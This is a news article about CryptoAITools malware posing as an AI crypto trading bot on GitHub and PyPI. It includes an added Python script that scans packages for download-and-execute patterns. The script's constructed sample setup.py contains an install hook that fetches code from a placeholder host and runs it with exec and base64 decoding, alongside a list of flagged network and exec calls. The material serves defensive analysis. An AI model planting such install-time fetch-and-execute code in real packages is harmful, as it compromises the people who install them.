Malware disguised as a Python-based trading bot reportedly targeted crypto investors in a multi-vector supply chain attack. Attackers are adopting new methods day by day, and their campaigns are intensifying as trading volume in the cryptocurrency markets revives.
Attack Methods
Crypto traders have been targeted by an advanced virus masquerading as artificial intelligence (AI)-based crypto trading software, according to a new blog post from the cloud-based cybersecurity firm Checkmarx. The malware aims to steal sensitive data and empty crypto wallets.
Checkmarx stated that the malware was distributed via GitHub and PyPI (the Python Package Index). PyPI is the central repository for Python packages, and the malware targeted both Windows and macOS.
Technical Details of the Attack
The malware uses deceptive graphical user interfaces (GUIs) to confuse victims and follows a multi-stage infection process that redirects them to a fake website. The attackers build elaborate pretexts and a staged attack chain to reach investors’ data through an application disguised as a trading bot. “CryptoAITools malware implements a sophisticated multi-stage infection process using a fake website to lure victims into its secondary malware,” Checkmarx said.
“CryptoAITools malware includes a graphical user interface (GUI) as a key component in its social engineering strategy. Once activated, the second-stage malware presents itself as an ‘AI Bot Starter’ application.” “They follow such a gradual path to confuse users and collect sensitive information, rather than directly infecting them with the virus.” – Checkmarx
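To make the distribution channel (GitHub and PyPI) and the staged fetch-then-run behaviour described above concrete from the defender's side, here is an added example that is not Checkmarx's analysis tooling and not code from the campaign. It statically triages a downloaded Python package before it is installed: it resolves import aliases, walks the AST of every .py file, and flags install-time hooks in setup.py, network fetches, base64 decoding, process spawning and dynamic code execution. A file that both fetches from the network and executes or spawns something is labelled download-and-execute. The sample package it scans is constructed inline; the package name, URL and file layout are placeholders, not indicators from the report.

```python
"""Static triage of a Python package for stage-2 downloader patterns.

Added example, not from Checkmarx or the campaign. A hit is a signal for
manual review, not proof of malice: legitimate packages also call these APIs.
"""
from __future__ import annotations

import ast
import os
import tempfile
from dataclasses import dataclass

# Fully qualified call targets worth a second look, grouped by what they enable.
SUSPICIOUS = {
    "urllib.request.urlopen": "network",
    "urllib.request.urlretrieve": "network",
    "requests.get": "network",
    "requests.post": "network",
    "socket.socket": "network",
    "exec": "dynamic-exec",
    "eval": "dynamic-exec",
    "base64.b64decode": "decode",
    "subprocess.Popen": "spawn",
    "subprocess.run": "spawn",
    "subprocess.call": "spawn",
    "os.system": "spawn",
}


@dataclass(frozen=True)
class Finding:
    path: str
    lineno: int
    call: str
    category: str


def _collect_aliases(tree: ast.AST) -> dict[str, str]:
    """Map each locally bound import name to the qualified name it refers to."""
    aliases: dict[str, str] = {}
    for node in ast.walk(tree):
        if isinstance(node, ast.Import):
            for a in node.names:
                # `import urllib.request` binds `urllib`; `import x.y as z` binds `z` to x.y
                aliases[a.asname or a.name.split(".")[0]] = a.name if a.asname else a.name.split(".")[0]
        elif isinstance(node, ast.ImportFrom) and node.module:
            for a in node.names:
                aliases[a.asname or a.name] = f"{node.module}.{a.name}"
    return aliases


def _dotted(node: ast.AST, aliases: dict[str, str]) -> str | None:
    """Turn the callee of a Call into a dotted name, resolving import aliases."""
    if isinstance(node, ast.Name):
        return aliases.get(node.id, node.id)
    if isinstance(node, ast.Attribute):
        base = _dotted(node.value, aliases)
        return f"{base}.{node.attr}" if base else None
    return None  # callee is itself a call, subscript, etc.: not resolvable statically


def scan_source(src: str, path: str) -> list[Finding]:
    """Return every suspicious call in one source file."""
    tree = ast.parse(src, filename=path)
    aliases = _collect_aliases(tree)
    return [
        Finding(path, node.lineno, name, SUSPICIOUS[name])
        for node in ast.walk(tree)
        if isinstance(node, ast.Call)
        and (name := _dotted(node.func, aliases)) in SUSPICIOUS
    ]


def verdicts(findings: list[Finding]) -> dict[str, list[str]]:
    """Summarise per-file categories into the patterns a reviewer cares about."""
    per_file: dict[str, set[str]] = {}
    for f in findings:
        per_file.setdefault(f.path, set()).add(f.category)
    labels: dict[str, list[str]] = {}
    for path, cats in per_file.items():
        tags = []
        if "network" in cats and cats & {"dynamic-exec", "spawn"}:
            tags.append("download-and-execute")  # fetch a second stage, then run it
        if os.path.basename(path) == "setup.py":
            tags.append("install-time-behaviour")  # runs during `pip install`
        labels[path] = tags
    return labels


def scan_package_dir(root: str) -> tuple[list[Finding], dict[str, list[str]]]:
    findings: list[Finding] = []
    for dirpath, _, files in os.walk(root):
        for fn in files:
            if fn.endswith(".py"):
                p = os.path.join(dirpath, fn)
                with open(p, encoding="utf-8") as fh:
                    findings.extend(scan_source(fh.read(), p))
    return findings, verdicts(findings)


def build_sample_package() -> str:
    """Write a constructed two-file package to a temp dir and return its path."""
    root = tempfile.mkdtemp(prefix="pkg-triage-")
    # Constructed sample: an install hook that fetches and executes a blob (placeholder URL).
    setup_py = (
        "from setuptools import setup\n"
        "from setuptools.command.install import install\n"
        "import base64, urllib.request as ur\n\n"
        "class PostInstall(install):\n"
        "    def run(self):\n"
        "        install.run(self)\n"
        "        blob = ur.urlopen('https://stage2.example.invalid/payload').read()\n"
        "        exec(base64.b64decode(blob))\n\n"
        "setup(name='ai-trading-bot', version='0.1', cmdclass={'install': PostInstall})\n"
    )
    bot_py = "import json\ndef load_config(path):\n    with open(path) as fh:\n        return json.load(fh)\n"
    for name, body in (("setup.py", setup_py), ("bot.py", bot_py)):
        with open(os.path.join(root, name), "w", encoding="utf-8") as fh:
            fh.write(body)
    return root


if __name__ == "__main__":
    found, labels = scan_package_dir(build_sample_package())
    for f in found:
        print(f"{f.path}:{f.lineno}: {f.call} [{f.category}]")
    print(labels)
```

Running it on a real package means pointing scan_package_dir at an unpacked sdist or wheel (for example after `pip download --no-deps --no-binary :all: <name>`), so the code is inspected before anything in setup.py gets a chance to execute.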
The attacker also set up a Telegram channel posing as technical support for the product, aiming to build trust by luring users with free trial offers.
“In the Telegram chat, the attacker uses various tactics to lure potential victims. They build credibility and reputation by offering ‘bot support’. To attract users, they promote the GitHub code repository as the ‘most powerful bot’ to appeal to those looking for advanced trading tools.” – Checkmarx
Checkmarx said the malware has “significant” consequences for its victims, including identity theft and the theft of browser data, sensitive computer files and crypto assets.
As a result, this new method threatens the security of crypto investors and shows that caution is needed. Users should not download software from unreliable sources and should avoid suspicious links. Keeping antivirus software up to date and enabling additional protections such as two-factor authentication is also beneficial.
Disclaimer: The information contained in this article does not constitute investment advice. Investors should be aware that cryptocurrencies carry high volatility and therefore risk, and should carry out their transactions in line with their own research.